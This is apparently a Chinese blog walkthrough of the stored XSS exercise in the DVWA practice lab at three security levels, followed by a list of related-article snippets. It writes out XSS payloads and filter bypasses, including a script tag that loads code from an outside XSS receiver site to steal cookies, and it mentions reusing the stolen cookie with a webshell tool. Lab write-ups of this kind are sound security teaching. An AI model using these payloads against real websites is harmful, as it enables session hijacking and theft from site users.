DVWA-----------XSS (stored)

最新推荐文章于 2024-12-08 18:00:00 发布
最新推荐文章于 2024-12-08 18:00:00 发布
阅读量329 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 渗透测试 靶机 DVWA
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/haha13l4/article/details/90319609
本文主要介绍了XSS(存储型)攻击,其长期存储于服务器端。分别阐述了low、medium、high三个级别的情况,low级别存在存储型xss,可获取cookie;medium级别可通过大小写绕过;high级别对message参数编码,name参数部分绕过方式失效,但可通过其他标签注入恶意js代码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

XSS(存储型)

长期存储于服务器端;

一、low级别

输入 1 提交
在这里插入图片描述
输入<script>alert('XSS')</script>
在这里插入图片描述
在这里插入图片描述
存在存储型的xss,所以每次打开都会弹框。
下面的都可以尝试
<body onload=alert('XSS1')>

<a href=http://192.168.37.128>登录</a>

`<img src=http://192.168.88.147/a.jpg οnerrοr=alert(‘XSS2’)>

`<script>window.location="http://www.baidu.com"</script> 重定向

获取cookie
注册一个xss接受平台 http://xss.fbisb.com/ 登录
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
插入到里面</tExtArEa>'"><sCRiPt sRC=http://xss.fbisb.com/GWz9></sCrIpT>
在这里插入图片描述
在这里插入图片描述
提交之后看都我们刚才创建的项目里面有了接受的cookie
在这里插入图片描述
然后把这个cookie用菜刀连接

二、medium级别

可以通过大小写绕过

其他语句和上面一样,script改大写就可以了。

三、high级别

查看源码
在这里插入图片描述
由于对message参数使用了htmlspecialchars函数进行编码,因此无法再通过message参数注入XSS代码;

但是对于name参数,High级别的代码使用preg_replace() 函数用于正则表达式的搜索和替换,将script前后相关的内容都替换为空,使得双写绕过、大小写混淆绕过不再有效;(正则表达式中i表示不区分大小写)

在High级别中,虽然在name参数中无法使用<script>标签注入XSS代码,但是可以通过img、body等标签事件或者iframe等标签的src注入恶意的js代码。

<body onload=alert('XSS1')>

<a href=http://192.168.37.128>登录</a>


<img  src=http://192.168.88.147/a.jpg onerror=alert('XSS2')>
XSS(Stored)
m0_62094846的博客
04-16 421
low <script>alert('xss')</script> middle <script>被过滤了,' 被转义了,<>也是被过滤了,可以尝试用编码的方式绕过,不过浏览器中会限制长度,抓包尝试 但是我编码成&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114
DVWA -XSSStored-通关教程-完结
刘箫-技术库
04-11 3464
XSS 攻击全称跨站脚本攻击。是指用户在 Web 页面中提交恶意脚本,从而使浏览包含恶意脚本的页面的用户在不知情的情况下执行该脚本,导致被攻击的行为。与 SQL 注入类似,XSS 也是利用提交恶意信息来实现攻击效果的攻击行为。但是 XSS 一般提交的是 Javascript 脚本,运行在 Web 前端,也就是用户的浏览器;而 SQL 注入提交的SQL 指令是在后台数据库服务器执行。所以两者攻击的对象是不一样的。
DVWA-13-XSS(Stored)
dahe
03-07 429
目录 1.概念 2.实验 2.1 LOW 2.2 Medium 2.3 High 1.概念 存储型XSS又称持久型XSS,攻击脚本将被永久性地存放在目标服务器的数据库或文件中,具有很高的隐蔽性。 攻击方式:这种攻击多见于留言版,攻击者在流言的过程中,将恶意脚本连同正常的信息一起注入帖子的内容中。内容被服务器存储下来,恶意脚本也永久地被存放在服务器的数据库中。当其他用户浏览这个被注入了恶意脚本的内容时,恶意脚本会在他们的浏览器中得到执行。 例如,恶意攻击者在留言板中加入以下代码 <s
DVWA靶机-存储型XSS漏洞(Stored)
weixin_43726831的博客
11-25 5454
DVWA靶机-存储型XSS漏洞(Stored) 前章: DVWA靶机-暴力破解(Brute Force) && DVWA靶机的四个安全等级 DVWA靶机-命令注入漏洞(Command Injection) DVWA靶机-文件包含漏洞(File Inclusion) DVWA靶机-文件上传漏洞(File uploads) DVWA靶机-跨站请求伪造(CSRF) DVWA靶机-存储型X...
DVWA-XSS(Stored)
weixin_44866139的博客
02-01 689
Low 直接输入 1、查看服务器端源代码 <?php if( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = trim( $_POST[ 'txtName' ] ); // Sanitize message...
XSSStored
陌茗228.的博客
04-22 251
XSSStored): 存储型跨站脚本攻击 Low: <?php if( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = trim( $_POST[ 'txtName' ] ); // Sanitize message input $message = stripslashes( $message );
DVWA-master.zip
08-22
DVWA中的"XSS (Reflected)"和"XSS (Stored)"章节分别展示了反射型和存储型XSS的攻击方式。 3. **CSRF(Cross-Site Request Forgery)跨站请求伪造**:攻击者诱使用户在当前已登录的Web应用上下文中执行非预期的操作...
DVWA-存储型xss
Darklord.W
04-09 605
存储型: 低: 输入 <script>alert('XSS stored')</script> 存储型XSS是长期存储在服务器端,每次访问时都会执行js脚本 <script onload=alert('XSS1')> <a href=https://www.baidu.com>登录</a>3 <scrip...
dvwa-xss攻击无法
最新发布
03-18
DVWA中有反射型XSS(Reflected)和存储型XSSStored),如果用户在错误的模块输入payload,也可能无法触发窗。需要确认用户是否在正确的页面提交payload。 最后,可能需要查看服务器端的代码,了解具体的过滤...
DVWA-XSS(Reflected+Stored)
原味瓜子、的博客
09-24 400
文章目录XSS-Reflected反射型一、各等级漏洞分析及利用XSS-Stored存储型一、各等级漏洞分析及利用 XSS-Reflected反射型 把用户输入的数据反射给浏览器,诱使用户点击一个恶意链接,才能攻击成功。 一、各等级漏洞分析及利用 Low等级,没做任何过滤 直接 medium等级,过滤掉<script>,用空替换掉 大小写、过滤规则漏洞利用,使用其他标签 high等级,匹配一些<script>的关键字符,进一步过滤<script>
DVWA--XSS (Stored)
When you collect everything, you understand nothing.
09-08 538
0x00 概述 存储型xss的不同之处在于,它可以将用户构造的有害输入直接存储起来,不需要攻击者构造链接诱使受害人点击触发,而是目标网站的用户只要访问插入恶意代码的网站就能触发,相比较反射型xss更为隐蔽,危害更大,受害者也会更多。 观察存储型XSS的PHP源代码可知,其各个级别的过滤策略与反射型类似,Payload也类似,这里不再赘述。与前面的反射型XSS有如下两点不同的是: 0x01 ...
DVWA--- 十、存储型XSS(XSS Stored)
qq_43168364的博客
05-31 665
XSS Stored 目录 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 五、预防方法 一、low级别 不多说直接尝试写入 窗成功 由于他是存储型的只要我们点击该模块就会引发窗,可以看到我们的JS代码是写入了数据库的,只要不清除他就会一直存在. 代码审计 相关函数 trim(string,charlist)函数: 移除字符串两侧的空白字符或其他预定义字符。string—必需, 规定要检查的字符串。charlist—可选, 规定从字符串中删除哪些字符
DVWA靶场——XSS(Stored)
sucker的博客
12-02 2297
标签和alert关键字的机制。2,使用最简单的XSS漏洞测试语句进行测试,但是要先判断存在漏洞的注入点,payload:<script>alert('XSS')
DVWA--XSS(stored)
weixin_30410119的博客
05-23 260
XSS 0X01 1、简介 跨站脚本(cross site script)为了避免与样式css混淆,所以简称为XSSXSS是一种经常出现在web应用中的计算机安全漏洞,也是web中最主流的攻击方式。那么什么是XSS呢? XSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到web页面中去。使别的用户访问都会执行相应的嵌入代码。 从而盗...
DVWAXSS(Stored)
「我唯一会的和擅长的只有网络安全,如果我不能在我最擅长的事情上取得成功,那么我根本不知道,我的人生还有什么意义。」
12-08 1393
倘若人生一马平川,活着还有什么意思呢。
【工具-DVWADVWA渗透系列十二:XSS(Stored)
qqchaozai的专栏
10-26 2193
前言 DVWA安装使用介绍,见:【工具-DVWADVWA的安装和使用 本渗透系列包含最新DVWA的14个渗透测试样例: 1.Brute Force(暴力破解)2.Command Injection(命令注入)3.CSRF(跨站请求伪造)4.File Inclusion(文件包含)5.File Uploa...
dvwa详解_DVWA--XSS(stored)
weixin_33478575的博客
12-24 1037
XSS0X011、简介跨站脚本(cross site script)为了避免与样式css混淆,所以简称为XSSXSS是一种经常出现在web应用中的计算机安全漏洞,也是web中最主流的攻击方式。那么什么是XSS呢?XSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到web页面中去。使别的用户访问都会执行相应的嵌入代码。从而盗取用户资料、利用用户身份...
DVWA-XSS (Stored)(存储型跨站脚本攻击)
简简的博客
02-02 1052
本系列文集:DVWA学习笔记 存储型XSS,持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,用户访问该页面的时候触发代码执行。这种XSS比较危险,容易造成蠕虫,盗窃cookie等。 ##Low: 相关函数介绍: trim(string,charlist) 函数移除字符串两侧的空白字符或其他预定义字符,预定义字符包括...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值